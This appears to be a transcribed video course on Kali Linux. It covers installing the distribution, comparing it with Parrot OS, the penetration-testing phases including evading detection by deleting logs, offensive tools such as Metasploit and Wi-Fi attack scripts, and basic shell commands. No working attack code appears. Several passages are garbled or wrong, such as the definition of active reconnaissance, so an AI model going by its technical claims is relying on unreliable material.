testing and operating systems. During all these project lifelines, there have been only a few different developers, as the team has always been small. The first project was called WOPEX, which stands for White Hat Knopex. As can be inferred from the name, it was based on the Knopex operating system as its underlying OS. WOPEX had releases ranging from version 2.0 to 2.7. This made way for the next project, which was known as WAX, or the longhand being White Hat Slacks. The name change was because the base OS was changed from Knopex to Slacks. WAX started at version 3 as a nod, it carrying on from WOPEX. There was a similar OS being produced at the same time, Auditor Security Collection, often being shortened to just Auditor, which was once again using Knopex. Its efforts were combined with WAX to produce Backtrack. Backtrack was based on Slackware from version 1 to version 3, but switched to Ubuntu later on with version 4 to version 5. Using the experience gained from all of this, Kali Linux came after Backtrack in 2013. Kali started off using Debian stable as the engine under the hood before moving to Debian testing when Kali Linux became a rolling operating system. Now that we understand the history and the purpose of Kali Linux, let us learn a little more about its distinct features. The latest version of Kali comes with more than 600 penetration tools pre-installed. After reviewing every tool that was included in Backtrack, developers have eliminated a great number of tools that either simply did not work or which duplicated other tools that provided the same or similar functionality. The Kali Linux team is made up of a small group of individuals who are the only ones trusted to commit packages and interact with the repositories, all of which is done using multiple secure protocols. Restricting access of critical code bases to external assets greatly reduces the risk of source contamination, which can cause Kali Linux users worldwide a great deal of damage as a direct victim of cybercrime. Although penetration tools tend to be written in English, the developers have ensured that Kali includes true multilingual support, allowing more users to operate in their native language and locate the tools they need for the job. The more comfortable a user feels with the intricacies of the operating system, the easier it is to maintain a stronghold over the configuration and the device in general. Since ARM-based single-board systems like the Raspberry Pi are becoming more and more prevalent and inexpensive, the development team knew that Kali's ARM support would need to be as robust as they could manage with fully working installations. Kali Linux is available on a wide range of ARM devices and has ARM repositories integrated with the mainline distributions, so the tools for ARM are updated in conjunction with the rest of the distribution. All this information is necessary for users to determine if Kali Linux is the correct choice for them. If it is, what are the ways that they can go forward with this installation and start their penetration testing journey? The first way to use Kali Linux is by launching the distribution in the live USB mode. This can be achieved by downloading the installer image file or the ISO file from the Kali Linux website and flashing it to a USB drive with a capacity of at least 8 GB. Some people don't need to save their data permanently, and a live USB is the perfect solution for such cases. After the ISO image is flashed, the thumb drive can be used to boot a fully working installation of the operating system, with the caveat that any changes made to the OS in this mode are not written permanently. Some cases allow persistent usage in live USBs, but those require further configuration than normal situations. But what if the user wants to store data permanently in the installed OS? The best and the most reliable way to ensure this is the full-fledged hard disk installation. This will ensure the complete usage of the system's hardware capabilities and will take into account the updates and the configurations being made to the OS. This method is supposed to override any pre-existing operating system installed on the computer, be it Windows or any other variant of Linux. The next alternative route for installing Kali Linux would be to use virtualization software such as VMware or VirtualBox. The software will be installed as a separate application on an already existing OS, and Kali Linux can be run as an operating system in the same computer as a window. The hardware requirements will be completely customizable, starting with the allotted RAM to the virtual hard disk capacity. The usage of both a host and guest operating system like Kali Linux allows users a safe environment to learn while not putting their systems at risk. If you want to learn more about how one can go forward with this method, we have a dedicated video where Kali Linux is being installed on VMware while running on a Windows 10 operating system. You can find the link in the description box to get started with your very own virtual machine. The final way to install Kali Linux is by using a dual boot system. To put it in simple words, the Kali Linux OS will not be overwriting any pre-installed operating system on a machine, but will be installed alongside it. When a computer boots up, the user will get a choice to boot into either of these operating systems. Many people prefer to keep both the Windows and Kali Linux installed, so the distribution of work and recreational activities is also allotted effectively. It gives users a safety valve should their custom Linux installation run into any bugs that cannot be fixed from within the operating system. Professionals in security testing, penetration testing, and ethical hacking utilize Linux as their preferred operating system. Provide several configurable distributions that you may configure based on your end use. Kali Linux and Parrot OS are two popular penetration testing distributions. While these operating systems each have unique offerings, the overall choice can differ between personnel thanks to their various tools and hardware specifications. Today we will look at both these distributions and settle on the perfect choice for each type of user. Let's go through the agenda for this video. We will learn about Kali Linux and Parrot Security OS from scratch, while understanding their primary selling points as a Linux distribution catered towards penetration testers. Next, we know about some features of these operating systems that stand out of their package. Finally, we directly compare Kali Linux and Parrot Security OS, thereby making a clear-cut conclusion on which OS is perfect on a per-requirement basis. So let's start by learning about Kali Linux from a ground level. Kali Linux, which is formerly known as Backtrack Linux, is an open source Linux distribution aimed at advanced penetration testing and security auditing. It contains several hundred tools targeted towards various information security tasks such as penetration testing, security research, computer forensics, and reverse engineering. Kali Linux is a multi-platform solution, accessible and freely available to information security professionals and hobbyists. Among all the Linux distributions, Kali Linux takes its roots from the Debian operating system. Debian has been a highly dependable and a stable distribution for many years, providing a similarly strong foundation to the Kali Linux desktop. While the operating system can practically modify every single part of our installation, the networking components of Kali Linux come disabled by default. This is done to prevent any external factors from affecting the installation procedure, which may pose a risk in critical environments. Apart from boosting security, it allows a more profound element of security control to the most enthusiastic of users. Now, let's take a look at Parrot Security operating system. Parrot Security OS is a Debian-based Linux distribution with an emphasis on security, privacy, and development. It is built on the Debian's testing branch and uses a custom hardened Linux kernel. Parrot Security contains several hundred tools targeted towards tasks such as penetration testing, computer forensics, reverse engineering, and security research. It is seen as a generally lightweight distribution that can work under rigorous hardware and software specifications. It features a distinct forensics mode that does not mount any of the system's hard disks or partitions and has no influence on the host system, making it much more stealthy than its regular occurrence. This mode is used on the host system to execute forensic procedures. A rolling release is a paradigm in which software upgrades are rolled out constantly rather than in batches of versions in software development. This ensures that the software is constantly up to date. A rolling release distribution such as Parrot Security OS follows the same concept. It provides the most recent Linux kernel and software versions as soon as they become available. With the basic introduction to the operating systems out of the way, let us take a look at the unique features of both Kali Linux and Parrot Security OS. The latest version of Kali Linux comes with more than 600 penetration tools pre-installed. After reviewing every tool included in Backtrack, developers have eliminated a significant number of tools that either simply did not work or duplicated other tools that provided the same and similar functionality. The Kali Linux team comprises a small group of individuals who are the only ones trusted to commit packages and interact with the repositories, all of which is done using multiple secure protocols. Restricting access of critical code bases to external assets dramatically reduces the risk of source contamination, which can cause Kali Linux users worldwide a great deal of damage as a direct victim of cybercrime. Although penetration tools tend to be written in English, the developers have ensured that Kali includes proper multilingual support, allowing more users to operate in the native language and locate the tools they need for their job. The more comfortable a user feels with the intricacies of the operating system, the easier it is to maintain a strong hold over the configuration and the device in general. Since ARM-based single-board systems like the Raspberry Pi are becoming more prevalent and inexpensive, the development team knew that Kali's ARM support would need to be as robust as they could manage with fully working installations. Kali Linux is available on a wide range of ARM devices and has ARM repositories integrated with the mainline distribution, so the tools for ARM are updated in conjunction with the rest of the distribution. Let's take a look at some of the features of Parrot Security operating system now. Along with a giant catalog of scripts, Parrot Security OS has its own hardened Linux kernel modified explicitly to provide as much security and resistance to hackers as possible in the first line of defense. The configurations in the operating system act as the second gateway, taking care of malicious requests and dropping them off. This is particularly beneficial since should there be a scenario where the latest Linux kernel is causing some particular issue, the Parrot OS development team will most likely iron it out first before passing it on as an update. If the custom hardened kernel wasn't reason enough, Parrot Security developers managed to install more hacking tools and scripts to ensure a smooth transition for the Kali Linux users. All the tools you find in Kali are present in Parrot OS and a few extra ones for good measure. And this has been achieved while keeping roughly the same operating system size between both of them. However, it's not all productivity points for Parrot OS. They provide a choice between two different desktop environments, Mate, which comes pre-installed by default, and KDE. For those unfamiliar with Linux terminology, you can think of desktop environments as the main UI for a distribution. Being highly modular in nature, one can use Parrot Security OS while adding another desktop environment that they find appealing. While Kali Linux has only a single option, Parrot Security has provided two optimized builds with Mate Desktop and KDE Desktop. One of the primary advantages of Parrot OS over Kali Linux is that it's relatively lightweight. This implies that it takes significantly less disk space and computing power to function correctly, with as little as 320 MB of RAM required. In reality, Parrot OS is designed to operate successfully off a USB stick, but Kali Linux does not work well from a USB drive and is generally installed in a virtual machine. Parrot OS is more of a niche distribution if you're searching for something lighter than Kali Linux. Features are great, but what about performance? Real-world metrics. Let us compare both these operating systems directly with respect to their hardware specifications and usability. In the end, we can decide on what distribution is fit for each type of user. For our first point of comparison, let's take a look at the RAM required. For optimum performance of the operating system, which is highly essential when trying to crack hashes or something of similar nature, RAM usage is a very important facet. While Kali Linux demands at least 1 GB of RAM, Parasecurity can operate optimally with a minimum of 320 MB of RAM. For correctly displaying graphical elements, Kali Linux requires GPU-based acceleration, while this is not the case with Parasecurity OS, which doesn't require any graphical acceleration needed from the user side. Once these operating systems are installed on VMware using their live boot ISOs, they take up a minimum amount of hard disk storage. Both of these operating systems have a recommended disk storage of minimum of 20 GB in Kali Linux and a minimum of 15 GB in Parasecurity, so they can install all the tools necessary in the ISO file. When it comes to the category and the selection of tools, Kali Linux has always been the first in securing every single tool available for hackers in the penetration testing industry. Parasecurity, on the other hand, has managed to take it up a notch. While specializing in wireless pen testing, Parasecurity makes it a point that all the tools that Kali Linux provides has been included in the ISO, while simultaneously adding some extra tools that many users will have to install from third-party sources in Kali Linux. Being a decade-old penetration testing distribution, Kali Linux has formed up a very big community with strong support signature. Parasecurity, on the other hand, is still growing, and it is garnering much more interest among veteran penetration testers and ethical hackers. A primary drawback of Kali Linux is the extensive hardware requirement. To perform optimally, it requires higher memory than Parasecurity. It also needs graphical acceleration while demanding more virtual hard disk storage. Parasecurity, on the other hand, was initially designed to run off a USB drive directly, thereby requiring very minimal requirements from a hardware perspective, like just 320 MB of RAM and no graphical acceleration needed. This means Parasecurity is much more feasible for people who are not able to devote massive resources to either their virtual machine or on their laptop hard disk directly. With the comparison done between both of these operating systems, let's take a look at the type of users both of these are catered to. One can go with Kali Linux if they want the extensive community support offered by its users, if they want to go with a trusted development team that have been working on this distribution since many years, if they have a powerful system which can run Kali Linux optimally without having to bottleneck performance, and if they are comfortable with a semi-professional environment which may or may not be very useful for new beginners. One can decide to go with Parasecurity if they want to go with a very lightweight and lean distribution that can run pretty much on all systems. It also has a lot of tools pre-installed, and some of them are not even present on Kali Linux. It is much more suitable for underpowered rigs where users do not have a lot of hardware resources to provide to the operating system, and thereby it is much more feasible for people with underpowered laptops or no graphical acceleration. Compared to Kali Linux, Parasecurity's desktop environment is also relatively easier to use for new beginners. For people who are just getting into ethical hacking, Parasecurity does a relatively better job of introducing them to the operating system and to the various tools without having to dump them into the entire intricacies. The installation of Kali Linux. There are multiple ways to install Kali Linux. We can either install it on a normal hard drive, in a virtual machine software such as VMware or VirtualBox, or we can do that in hard bare metal machines. Now, for the convenience of explanation, we're going to install Kali Linux today on a virtual machine software known as VMware. VMware is able to run multiple operating systems on a single host machine, which in our case is a Windows 10 system. To get started with Kali Linux installation, we have to go to the website to download an image file. We go to Get Kali, and as you can see, there are multiple platforms on which this operating system can be inverted. As per our requirement, we're going to go with the virtual machine section. As you can see, it is already recommended by the developers. This is the download button, which will download a 64-bit ISO file. We can download 32-bit, but that is more necessary for hard metal machines, or if you're going to use it for older devices which do not support 64-bit operating systems yet. After clicking on the download button, we can see we have a WinRAR archive which will have the ISO files. For now, we have downloaded the ISO file and it is already present with me. So we can start working on the VMware side of things. Once the ISO file is downloaded, we open up VMware Workstation. We go to File and we create a new virtual machine. In these two options, it is highly recommended to go with the typical setup rather than the custom one. The custom is much more advanced and requires much more information from the user, which is beneficial for developers and people who are well versed with virtualization software, but for 90% of the cases, typical setup will be enough. Here, we can select the third option, which will be I will install the operating system later. In some operating systems, we can use the ISO file here directly and VMware will install it for us. But for right now, in the case of Kali Linux, the third option is always the safest. Kali Linux is a Linux distribution, so we can select Linux over here, and the version, as you can see here, have multiple versions such as the multiple kernels. Every distribution has a parent distribution. For example, Kali Linux has Debian, and there are other distributions which are based or forked from some parent distribution. Kali Linux is based off Debian, so we can go with the highest version of Debian, which is the Debian 10.x 64-bit. Go on next. We can write any such name. We can write Kali Linux so that it will be easier to recognize the virtual machine among this list of virtual machine instances. The location can be any location you decide to put. By default, it should be the documents folder, but anywhere you put, it will hold up all the information of the operating system, all the files you download, all the configurations you store, everything will be stored in this particular location that you provide. When we go next, we are asked about the disk capacity. This disk capacity will be all the storage that will be provided to your virtual machine of Kali Linux. Think of your Windows device. If you have a 1 terabyte of hard drive, you have the entirety of the hard disk to store data on. How much data you give here, you can only store up to that amount of data. Not to mention, some amount of capacity will be taken up by the operating system itself to store its programs and applications. For now, we can give around, let's say, 15 GB of information. Or if the recommended size for Debian is 20, you can just go ahead at 20. It depends all on the user case. If you are going to use it extensively, you can even go as high as 50 or 60 GB if you have plans to download many more applications and perform multiple different tests. Another option we get over here is storing virtual disks as a single file or storing them into multiple files. As we already know, this virtual machine runs entirely on VMware. Sometimes when transferring these virtual machine instances, let's say from a personal computer to a work computer, we're going to need to copy up the entire folder that we had mentioned before over here. Instead, all virtual machines have a portability feature. Now this portability feature is possible for all scenarios, except it is much easier if they split the virtual disk into multiple files. Now even if this makes porting virtual machines easier from either system to system or software to software, let's say if you want to switch from VMware to VirtualBox or vice versa, the performance takes a small hit. It's not huge, but it's recommended to go with storing the virtual disk as a single file if you have no purposes of ever moving the virtual machine. Even if you do, it's not a complete stop that it cannot be ported. It's just easier when using multiple files. But in order to get the best performance out of the virtual machine, we can store it as a single file over here. This is a summary of all the changes that we made and all the configurations that have been settled until now. Now at this point of time, we have not provided the .iso file yet, which is the installation file for the Kali Linux that we downloaded from this website. As of right now, we have only configured the settings of the virtual machine. So we can press on Finish. And we have Kali Linux in the list. Now, To make the changes further, we press on Edit Virtual Machine Settings. The memory is supposed to give the RAM of the virtual machine. So devices with RAM of 8 GB or below that, giving high amount of RAM will cause performance issues and the host system. If the memory has some amount of free storage left, let's say on idle storage, my Windows machine takes about 2 GB. So I have 6 GB of memory to provide. Although if you provide all of the 6 GB, it will be much more difficult for the host system to run everything properly. So for this instance, we can keep it as 2 GB of memory for the virtual machine instance. Similarly, we can use the number of processors and we can customize it according to our liking. Let's say if we want to use one processor, but we want to use 2 different cores, we can select them as well. Hard disk is pre-set up as the SCSI hard disk, and it does not need to be changed for the installation of this operating system at all. CD/ID DVD. This is where the installation file comes. You can think of the ISO file that we downloaded as a pen drive or a USB thumb drive, which is necessary to install an operating system. To provide this, we're going to select Use ISO image file. We're going to click on Browse. Go to Downloads and select the ISO file over here. Select Open, and we can see it is already loaded up. Next, in the network adapter, it is recommended to use NAT. This helps the virtual machine to draw the internet from the host machine settings. If your host machine is connected to the internet, then the virtual machine is connected as well. There are some other options such as host only or custom segments or LAN segments, but those are not necessary for installation. Rest of them are pretty standard, which do not need any extra configuration and can be left as it is. Press OK, and now we can power on this virtual machine. In this screen, we can choose how we want to proceed with the installation. We have a Start Installer option over here. So we're going to press Enter on that. We're going to wait for the things to load from the ISO file. The first step in the installation is choosing the language of the operating system. For this, we can go with English as standard. This is a location. This will be used for setting up the time and some of the internal settings which depend entirely on the location of the user. So for this, we're going to go with India. Configuring the keyboard, it's always recommended to go with the American English first. Many people make a mistake of going with the Indian keyboard if it is possible, and it provides a lot of issues later on. So it's always preferred to go with the American English, and if later we see some necessity of another keyboard dialect that is required, we can install it later. But for now, we should always stick with American English as a basic. At this point, it's going to load the installation components from the .iso file. It is a big file of 3.6 GB, so it has a lot of components that need to be put into the virtual machine, which can also be used to detect hardware. Once the hardware and the network configuration is done by the ISO file, we want to write a host name for the system. This host name can be anything which is used to recognize this device on a local network or a LAN cable. Let's say if we use the name Kali. Domain name, we can skip it for now. It's not necessary as such for the installation. This is the full name for the user. Let's say we can provide the name as Simplilearn as a full name. Next, we're going to set up a username. This username is going to be necessary to identify the user from its root accounts and the subsequent below accounts. For now, we can give it as something as simply123. Now we have to choose a password for the user. Now remember, since this is the first user that is being added onto this newly installed operating system, it needs to be a password for the administrator. We can use whichever password we like over here and use the same password below. and press on continue. At this point, it's going to detect on the components on which the operating system can be installed. Like here, there are multiple options like the use entire disk and set up LVM, use entire disk and set up encrypted LVM. For newcomers, it is recommended to just use the first one, since LVM encryption is something that you can learn afterwards when you're much more hands-on with the Linux operating system. For now, we're going to use the use entire disk guided installation and press on continue. When we set up the virtual machine on VMware, we had set up a disk capacity that we gave a purpose 20 GB. That is the hard disk which is being discovered here. Even though it is a virtual disk, on VMware it acts as a normal hard disk on which an operating system can be installed. So we select this one and press on continue. Here there is a multiple partition system. All the operating systems that are installed have different components. One is used for the keeping of the applications, one for the files, other for the RAM management and other things. For newcomers, it is always recommended to keep it in one partition. And we're going to select that and press on continue. This is just an overview of the partition it's going to make. As you can see, it has a primary partition of 20.4 GB and a logical partition of 1 GB used for swap memory. Now, these kind of naming can be confusing for people who are not well versed with Linux operating systems or in general virtualization. But for now, you can go ahead and press on continue, as this will be fine. We can press on finish partitioning and write changes to disk and continue. It's just a confirmation page. As you can see, it's wrote that SCSI3 is our virtual hard disk of 20 GB disk capacity. We write the changes to the disk. We press yes and click on continue. At this point, the installation has started. Now, this installation will take a while depending on the amount of RAM provided, the processors provided, and how quickly the performance of the system is being hampered by the host machine. On quicker systems, this will be rather quick, while on the smaller ones, this will take a while. Since this is going to take some time to install, as it is being run on a virtual machine with only 2 GB of RAM, we're going to speed up this part of the video so we don't have to waste any more time just watching the progress bar. Now that our core installation is completed, it's asking us to configure a package manager. The work of a package manager on Linux operating systems is similar to the Google Play Store on Android mobile devices and on the App Store for the Apple devices. It's an interface to install external applications which are not installed by default. Let's say for Google Chrome or any other browser which can be used to browse the internet. At this point of time, it's asked us to select a network mirror. We're going to select as yes and move forward with this. Next, it's going to ask us for an HTTP proxy, which we can leave it as blank and press it as continue forward. At this point of time, it's looking for updates to the Kali Linux installation. This will fetch the new builds from the Kali server, so the installation is always updated to the latest version. Now that the package manager is configured, we have the grub bootloader. The grub is used for selecting the operating system while booting up. Its core functionality is to allow the operating system to be loaded correctly without any faults. So at this point of time, if it asks install the grub bootloader to your primary drive, we can select it as yes and press continue. Remember, the installation was conducted on dev SDA. So we're going to select installation of the grub loader on the same hard disk that we have configured. We press this one and press continue. So now the grub bootloader is being installed. The grub is highly essential because it shows the motherboard where to start the operating system from. Even if the operating system is installed correctly and all the files are in correct order, the absence of a bootloader will not be able to launch the OS properly. As you can see, the installation is finally complete. So now we can press on continue and it's going to finalize the changes. Now you can see Kali Linux being booted up straight away. It doesn't check for the ISO file anymore since the operating system is now installed onto the virtual hard disk storage that we had configured before. Here we're going to enter our username and password that we had set up before. And we have the Kali Linux system booted up. And this is your homepage. We can see the installed applications over here, which are being used for penetration testing by multiple security analysts worldwide. All of these come pre-installed with Kali Linux, and others can be installed using the apt package manager that we had configured. We can see our full name over here. And with this, our installation of the Kali Linux is complete. It's no secret that the vast bulk of our internet usage is vulnerable to hacking, whether it's through hazardous messaging apps or faulty operating systems. Penetration testing has become the norm for vulnerability assessment in order to fill this vacuum in digital security. Kali Linux is a well-known operating system in this fight against hackers. Kali Linux, a distribution designed specifically for penetration testers, has layers of features that we will go over in today's lesson and take a look at some of the tools and features that the operating system has to offer. Let's take a look at the video's topics and features that the operating system has to offer. Let's take a look at the video's topics. We start by learning the requirements of an operating system like Kali Linux. We learn more about the core features of the OS and its intricacies. Moving on, we take a look at the 5 distinct stages of penetration testing that dictate the flow of vulnerability assessment in general. Next, we learn about some important tools that can be found on Kali Linux, which are geared specifically for ethical hacking purposes. And finally, we have an extensive demonstration where we work on some basic terminal commands, proxy tools, and a couple of highly regarded software from the crux of the operating system.
Choose from over 300 in-demand skills and get access to 1,000 plus hours of video content for free. Visit SkillUp by Simplilearn. Click on the link in the description to know more.
Let's start by learning why one should learn Kali Linux in the first place. In today's world, an organization's most valuable asset is its information or data. This is true for all kinds of businesses, be it public or private. On a daily basis, they all deal with enormous amounts of sensitive information. As a consequence, terrorist groups, hacking teams, and cyber thieves often attack them. To ensure this safety and protection, businesses use a variety of security measures and regularly update their index. Organizations must be proactive in this age of digitalization by regularly assessing and updating their security. Every day, hackers discover new methods to breach firewalls. Ethical hackers or white hat hackers provide a fresh perspective on security. They conduct penetration tests to validate security measures. Generally, they will penetrate your networks and give you relevant information about your security posture. Once an organization has this knowledge, it may upgrade its security procedures accordingly. The latest version of Kali Linux comes with more than 600 penetration tools pre-installed. After reviewing every tool that was included in Backtrack, developers have eliminated a great number of tools that either simply did not work or which duplicated other tools that provided the same or similar functionality. Occasionally, when conducting penetration testing or hacking, we must automate our activities since there may be hundreds of conditions and payloads to test, and manually examining everything is time-consuming. To improve our productivity, we utilize tools that come pre-packaged with Kali Linux. These tools not only save us time, but also accurately capture and process the data. The Kali Linux team is made up of a small group of individuals who are the only ones trusted to commit packages and interact with the repositories, all of which is done using multiple secure protocols. Restricting access of critical code bases to external assets greatly reduces the risk of source contamination. Although penetration tools tend to be written in English, the developers have ensured that Kali includes true multilingual support, allowing more users to operate in their native language and locate the tools they need to do for the job. Since ARM-based single-board systems like the Raspberry Pi are becoming more and more prevalent and inexpensive, the development team knew that Kali's ARM support would need to be as robust as they could manage with fully working installations. Kali Linux is available on a wide range of ARM devices and has ARM repositories integrated with the mainline distribution, so tools for ARM are updated in conjunction with the rest of the distribution tools. Now that we understand the necessity for an operating system like Kali Linux, let us take a look at some of its core features and offerings to the ethical hacking world. Kali Linux, formerly known as Backtrack Linux, is an open source Linux distribution which is aimed at advanced penetration testing and security auditing. It contains several hundred tools targeted towards various information security tasks such as penetration testing, security research, computer forensics, and reverse engineering. Kali Linux is a multi-platform solution accessible and freely available to information security professionals and hobbyists. Among all the Linux distributions, Kali Linux takes its roots from the Debian operating system. Debian has been a highly dependable and stable distribution for many years, providing a similarly strong foundation to the Kali Linux desktop. While the operating system is capable of practically modifying every single part of our installation, the networking components of Kali Linux come disabled by default. This is done to prevent any external factors from affecting the installation procedure, which may pose a risk in critical environments. Apart from boosting security, it allows a deeper element of security and control to the most enthusiastic of users. Let us now take a look at the 5 stages or phases of penetration testing. This is the first stage of the penetration test, which is known as the reconnaissance phase. In this stage, the security researcher collects information about the target. It can be done actively, which means you are collecting information without contacting the target, or even both. It helps security firms gather information about the target system, network components, active machines, open ports and access points, operating system details, etc. This activity can be performed by using information available in the public domain and using different tools. The next phase is more tool-oriented rather than performed manually, and it is the scanning phase. The penetration tester runs one or more scanner tools to gather more information about the target. The penetration tester runs one or more scanner tools to gather information about the target. By using various scanners such as war dialers, port scanners, network mappers, and vulnerability scanners, the tester collects as many vulnerabilities which help to turn an attack in a more sophisticated way. The next stage is known as the gaining access phase. In this phase, the penetration tester tries to establish a connection with the target and exploit the vulnerabilities found in the previous stage. Exploitation may be buffer overflow attacks, denial of service or DOS attacks, session hijacking, and many more. Basically, penetration tester extracts information and sensitive data from servers by gaining access using different tools. In the maintaining access phase, the penetration tester tries to create a backdoor for himself. It helps him to identify hidden vulnerabilities in the system and can later act as a gateway to retrieve control of the system. In the final phase of covering tracks, the penetration tester tries to remove all logs and footprints which help the administrator identify his presence. This helps the tester to think like a hacker and perform corrective actions to mitigate those activities. Now that we understand the basics of penetration testing and how ethical hackers go about their way, let us take a look at some notable tools which can be used on Kali Linux. At the top of the chain lies NMAP. NMAP is a free and open source utility port scanner which can be used for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. It is most beneficial in the early stages of ethical hacking, where a hacker must figure the possible entry point to a system before running the necessary exploits, thus allowing the hacker to leverage any insecure openings and breach the device. It's a part of the scanning phase of the penetration testing. NMAP uses raw IP packets in novel ways to determine what hosts are available on the network, what services these hosts are offering, what operating systems they are running and their versions, what type of packet filters and firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks but works fine against single hosts as well. Since every application that connects to a network needs to do so via a port, the wrong port or server configuration can open a can of worms which lead to a thorough breach of the system and ultimately a fully hacked device. Next on the list we have Metasploit. The Metasploit framework is a very powerful tool that can be used by cybercriminals as well as ethical hackers to probe systemic vulnerabilities on networks and servers. As a part of the third stage of penetration testing, it's an open source framework which can be easily customized and used with most operating systems. With Metasploit, the ethical hacking team can use a ready-made or custom code and introduce it into a network to probe for weak spots. As another flavor of threat hunting, once these flaws are identified and documented, the information can be used to address systemic weaknesses and prioritize solutions. Once a particular vulnerability is identified and the exploit is fed into the system, there are a host of options for the hacker. Depending on the vulnerability, hackers can even run root commands from the terminal, allowing complete control over the activities of the compromised system as well as all personal data stored on the device. A big advantage of Metasploit is the ability to run full-fledged scans on a target system, thereby giving a detailed picture of the security index of said system. This also provides the necessary exploits that can be used to bypass the firewalls and the antivirus software. Having a single solution to gather almost all the necessary points of attack is very useful for ethical hackers and penetration testers, as denoted by the high rank in this list. At number 3, we have Wireshark. Wireshark is the world's foremost and widely used networking protocol analyzer. It lets you see what's happening on your network at a microscopic level and is the de facto standard across many commercial and non-profit enterprises, government agencies, and educational institutions. Wireshark is a popular open source tool to capture network packets and converts them to human-readable binary format. It provides every single detail of the organization's network infrastructure. It consists of devices designed to help measure the ins and outs of the network. The information collected through Wireshark can be used for various purposes, such as real-time or offline network analysis, identification of the traffic coming onto your network, its frequency, and its latency between specific hops. This helps network administrators generate statistics based on real-time data. Wireshark is also a cross-platform tool that can be installed on Windows, Linux, and Mac systems to enable hackers in all ecosystems to monitor network traffic irrespective of the operating system. The development team is determined to maintain this level of freedom for their users in the foreseeable future. The next tool on our list is AirGarden, which is a part of the third phase of penetration testing. This is a multi-use bash script for Linux systems to hack and audit wireless networks like our everyday Wi-Fi router and its counterparts. Along with being able to launch denial of service attacks on compromised networks, this multipurpose Wi-Fi hacking tool has very rich features which support multiple methods for Wi-Fi hacking, including multi-fi WPS hacking modes, all-in-one WEP attack, handshake file capturing, evil twin attacks, pixie dust, and so much more. It usually needs an external network adapter that supports monitor mode, which is necessary to be able to capture wireless traffic traversing the air channels. Thanks to its open source nature, AirGarden can be used with multiple community plugins and add-ons, thereby increasing its effectiveness against a wide variety of routers, both in the 2.4 GHz band and 5 GHz band. The next tool is John the Ripper. John the Ripper is an open source password security auditing and password recovery tool available for many operating systems. John the Ripper Jumbo supports hundreds of hash and cipher types, including for user passwords of operating systems, web apps, groupware, database servers, network traffic captures, encrypted private keys, file systems, and document files. Some of the key features of the tool include offering multiple modes to speed up password cracking, automatically detecting the hashing algorithm used by the passwords, and the ease of running and configuring the tool, making it a password cracking script of choice for novices and professionals alike. It can use dictionary attacks along with regular brute forcing to speed up the process of cracking the correct password without wasting additional resources. The word list being used in this dictionary attacks can be used from the user's end, allowing for a completely customizable process. Now that we have covered the basics of Kali Linux, let us take a look at the agenda for our demo today. We start out with a few terminal commands that are a basic part of a Linux operating system. We configure our own proxy chains to maintain anonymity while running penetration testing attacks on our victims. Next, we run a few NMAP scans on a local Windows 10 machine to find out the type of information that can be gathered in such a scenario. Moving on, we use Wireshark to monitor internet traffic and understand the importance of encryption and security when browsing the World Wide Web. Next, we learn about Metasploit and its various applications in the line of vulnerability assessment of a device. And finally, we use Metasploit to take root access of a fully updated Windows 10 computer system. Let's begin with some terminal basics on Kali Linux. When most people hear the term Linux, they envision a complex operating system used only by programmers. However, the experience is not as frightening as it appears. Linux is an umbrella term for a collection of free and open source Unix operating systems. There are many variants like Ubuntu, Fedora, Debian. These are distributions, will be a more precise term. When using a Linux operating system, you will most likely utilize a shell, which is a command line interface that provides access to the operating system services. The majority of Linux distributions ship with a graphical user interface, also known as GUI, as their primary shell. This is done to facilitate user interaction in the first place. Having said that, a command line interface is suggested due to its increased power and effectiveness. By entering the commands into the CLI, tasks that require a multi-step GUI procedure may be completed in a matter of seconds. We can start the terminal by clicking on the prompt icon here on top. Once the terminal is opened, we can put up our commands. The first command that we are going to look into is pwd. pwd stands for present working directory. As of right now, what you are seeing is the terminal window by default. If I write pwd and press enter, this shows the directory in which the terminal is being run on. As of right now, it's in the NF folder of my desktop, which is specifically this folder. If I open up this folder, you can see it is currently empty, as in it has no contents. If I use another command known as mkdir, which is supposed to stand for make directory, and I write nf2, shortage for new folder 2. If I open up the nf, you can see the new folder is created. This is how the pwd command works. Another important command to change directories, it's called the cd command. Let's say right now if I am in nf, I want to create a new file in nf2 folder or something else in the nf2 folder. I have to shift to cd nf2. Now if I write pwd, it will show the present working directory of home, Simplilearn, desktop, nf, and inside that I am in nf2 right now. It is done to navigate through the Linux files and directories. It requires either the full path or just the name of the directory. If we have to move a completely different folder on a completely different file, then we can use the entire path like this. For now, cd works. Another few commands is we can write cd ... and it will come back one folder. Now the PWD will be just NF and not NF2. Let's say we are in this folder and we want to go a different file. Let's say if we just go for CD home, Simplilearn. That's it. Right now, these are the folders in our current present working directory. We have the desktop, the documents, downloads, etc. From here, we can again go to the desktop using the same cd command, cross-check the changing of directories, and check the files again. And yes, there we go, NF. How do we know this? What are the commands that are used to show the files and folders? That folder is known as the ls command. ls can be used to view the contents of a directory. By default, this command will display the contents of your current working directory. If we add some other parameters, we can find the contents of other directories as well. There are some hidden files as well in Linux which cannot be showed just with ls. For example, if we just go to cd etc, which is a configuration folder for Linux, if we write ls now, these are the files that can be seen. If we want to see the hidden files, we'll have to add one more parameter here like ls-a, and as you can see, the number of files have increased this time around. There are other things as well that we can see with Linux. ls-al will show the hidden files along with some of the parameters and some of the permissions that has been provided for each file. As you can see, many of these files have root access. Some of them can write, some of them can read. It differs file to file, and the ls-al command is used to check each of these files' permission and change them accordingly if needed. The next command that we can look for is the cat command or concatenate. It is one of the most frequently used commands, and it is used to list the contents of a file on the output. For example, let's say if I have a file at the desktop. In this NF2 folder, I will create a document, create an empty file, E file. I'll open up the document and I'll write it as hello Kali. I will save this up. Now, to change the directories from etc to NF2, we have already discussed how to use the cd command using just the folder name. Now, if we want to go to the entire directory, we can write cd home. As you can see, it is already prompting us to complete the name of the directory. At this point, we just have to press tab and it completes it for ourselves. Next, we already know we have to enter the desktop, NF and NF2. And this brings us to the current working directory. Here, if we press ls, we can find a file over here. Now, as discussed for the concatenate, it is used to show the contents of a file. So right now, if we press cat, which stands for concatenate, e-file. As you can see, we have written hello Kali in the text file, and we can see the output right now. We can also use it to create new files. For example, if we write cat, any file name such as efile2. Here we can write anything. Hello Kali again. Once we press Ctrl C here, we can check efile2 and we have hello Kali again printed over here. We can see the same using the concatenate command as well. If I press ls, you can see we have two files here, and I can go with cat efile2 and I have hello Kali again. This is how the concatenate command works. Apart from this, it can be used to copy. There is a different command like called cp, which is used to copy the files from one place to another. Mind you, this is not moving. This is only going to copy the command. For example, 